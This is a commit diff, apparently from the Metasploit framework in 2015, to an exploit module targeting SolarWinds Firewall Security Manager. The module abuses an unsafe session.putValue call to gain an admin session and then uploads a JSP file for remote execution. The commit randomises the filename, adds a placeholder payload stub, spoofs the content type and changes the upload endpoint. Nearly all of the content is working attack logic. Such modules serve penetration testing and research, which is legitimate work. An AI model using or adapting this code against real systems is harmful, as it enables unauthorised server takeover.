This should be on the right track

wchen-r7 · wchen-r7 · commit 8ad07cdc0f32 · 2015-04-01T01:27:50.000-05:00
diff --git a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb
@@ -83,8 +83,8 @@ def exploit
     sid = put_session_value('admin')
     print_status("Your SID is: #{sid}")
 
-    filename = "test.jsp"
-    malicious_file = ''
+    filename = "#{Rex::Text.rand_text_alpha(5)}.jsp"
+    malicious_file = get_jsp_payload
     print_status("Uploading file: #{filename}")
     upload_exec(sid, filename, malicious_file)
   end
@@ -93,6 +93,12 @@ def exploit
   private
 
 
+  # Returns a JSP payload
+  def get_jsp_payload
+    'evil inside'
+  end
+
+
   # Creates an arbitrary username by abusing the server's unsafe use of session.putValue
   def put_session_value(value)
     res = send_request_cgi(
@@ -134,14 +140,14 @@ def upload_exec(sid, filename, malicious_file)
   # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\
   def upload_file(sid, filename, malicious_file)
     mime_data = Rex::MIME::Message.new
-    mime_data.add_part(malicious_file, nil, nil, "name=\"file\"; filename=\"#{filename}\"")
+    mime_data.add_part(malicious_file, 'application/vnd.ms-excel', nil, "name=\"file\"; filename=\"#{filename}\"")
     mime_data.add_part('uploadFile', nil, nil, 'name="action"')
 
     proto = ssl ? 'https' : 'http'
     ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}"
 
     send_request_cgi(
-      'uri'      => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
+      'uri'      => normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp'),
       'method'   => 'POST',
       'vars_get' => { 'action' => 'uploadFile' },
       'ctype'    => "multipart/form-data; boundary=#{mime_data.bound}",
